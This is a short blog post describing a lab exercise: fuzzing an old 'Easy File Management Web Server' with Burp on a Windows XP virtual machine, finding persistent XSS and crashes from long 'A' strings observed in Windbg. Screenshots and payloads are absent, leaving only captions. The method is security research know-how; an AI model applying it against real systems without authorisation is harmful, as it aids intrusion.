sobota, 29 października 2016

HTTP Server fuzzing with Burp

In the middle of time I was working on some HTTP server fuzzer created in python. I was wondering if I can get similar results when I will use only Burp proxy. Below example results.

For testing purposes I decided to install one old HTTP server called “Easy File Management Web Server”. You can find it here or here. As a ‘lab environment’ I prepared a WinXP SP3 machine on VirtualBox (with all other tools I’ll need to work, for example Windbg). Version of target software I used was 5.3:

Server is ready so we can start Burp and prepare our browser to connect to it via proxy. After we prepared an environment we can now start our “fuzzing”:

As an input I used 2 lists: first one was related for bugs I’m looking for during normal blackbox pentests, second one was prepared for basic fuzzing purposes, so I created a TXT file with multiple lines (length), contains “AAAA” strings (as a first case). Example of an attack, below:

“Easy File Management Web Server” is attached to Windbg, so we can observe results in “Server Logs” window. After a while I’ve got first results from first payload list – persistent XSS:

Another request, also seems to also be vulnerable:

Below results of an attack:

Ok, so basically: fuzzing in Burp is also possible. ;) Few results from 2nd list (“AAAA…”) you will find below. I used GET request to send multiple “A” characters to the application. Windbg presented results like on the screen below:

Another request/response looks like this:

And results of the request:

New result. Ok. I decided to observe this behavior a little more, and changed payload length again:

Changing length – and we’ll get new results:

Below screen from Burp with request, you can see different lengths for each request:

From ASM code, we can see that there will be no comparison between those 2 registers:

Base request I modified to work which is presented on the screen below:

Post probably will be continued but for now - maybe you will find it useful ;)


Brak komentarzy:

Prześlij komentarz